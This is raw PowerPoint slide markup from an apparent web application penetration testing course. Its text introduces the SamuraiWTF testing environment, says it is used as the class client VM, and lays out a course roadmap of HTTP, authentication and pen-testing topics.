              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36000053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1440" y="167640"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SamuraiWTF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="1676400"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Samurai Web Testing Framework is a live DVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bootable environment with a focus on web penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Similar to Backtrack, but focused on web app manipulation tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Created by Kevin Johnson of Secure Ideas </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and Justin Searle of UtiliSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is freely available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.samurai-wtf.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Released in 2008 and continues to be actively updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SamuraiWTF is designed to be used as a pen testing environment and a place to try out new tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 3" descr="Samurai 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75960" y="259080"/>
            <a:ext cx="3200400" cy="960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97945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30480"/>
            <a:ext cx="7772400" cy="1310640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SamuraiWTF Desktop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48381" y="1371600"/>
            <a:ext cx="4343400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Samurai is a graphical desktop environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Runs within VM or bootable DVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or, you could install it as a complete system on a hard drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many tools are pre-installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All of the Linux tools discussed in this class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It does not include the Windows tools from the class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also includes a pre-configured wiki to store results and collaborate with others during a pen test project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2355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28160" y="1737360"/>
            <a:ext cx="4721225" cy="426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37336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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SamuraiWTF within the Class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We have included a copy of SamuraiWTF on the class DVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is set up within a VM for ease of use in class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This VM is the client machine for the exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is also useful for day 6, the Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All of the exercises, except when noted, use this as the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All actions will be performed in this VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4032772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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
